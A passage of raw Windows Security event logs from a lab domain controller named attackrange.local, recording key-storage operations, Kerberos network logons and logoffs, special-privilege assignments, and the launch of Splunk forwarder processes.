Subject:
Security ID: NT AUTHORITY\LOCAL SERVICE
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Cryptographic Parameters:
Provider Name: Microsoft Software Key Storage Provider
Algorithm Name: ECDSA_P256
Key Name: Administrator@attackrange.local
Key Type: User key.
Additional Information:
Operation: Export of persistent cryptographic key.
Return Code: 0x0
04/19/2021 03:33:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5061
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=System Integrity
OpCode=Info
RecordNumber=264749
Keywords=Audit Success
Message=Cryptographic operation.
Subject:
Security ID: NT AUTHORITY\LOCAL SERVICE
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Cryptographic Parameters:
Provider Name: Microsoft Software Key Storage Provider
Algorithm Name: ECDSA_P256
Key Name: Administrator@attackrange.local
Key Type: User key.
Cryptographic Operation:
Operation: Open Key.
Return Code: 0x0
04/19/2021 03:33:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5058
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Other System Events
OpCode=Info
RecordNumber=264748
Keywords=Audit Success
Message=Key file operation.
Subject:
Security ID: NT AUTHORITY\LOCAL SERVICE
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Cryptographic Parameters:
Provider Name: Microsoft Software Key Storage Provider
Algorithm Name: UNKNOWN
Key Name: Administrator@attackrange.local
Key Type: User key.
Key File Operation Information:
File Path: C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\d4ca5289cf34fcb2bfb55faebd03c63e_a9c24923-99b2-4e93-832a-9a25a9ee4602
Operation: Read persisted key from file.
Return Code: 0x0
04/19/2021 03:33:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264753
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x861B9C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:33:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264752
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x861B9C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53653
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:33:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264751
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x861B9C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264765
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862586
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264764
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862674
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264763
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8626BC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264762
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x862754
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53658
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264761
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862754
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264760
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8626BC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53657
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264759
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8626BC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264758
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x862674
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264757
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862674
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264756
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x862586
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53656
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264755
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862586
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264754
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x89c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264767
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x720
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264766
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264768
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264769
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x187c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264771
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264770
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x193c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264772
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862754
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264775
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x865987
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264774
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x865987
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53669
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264773
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
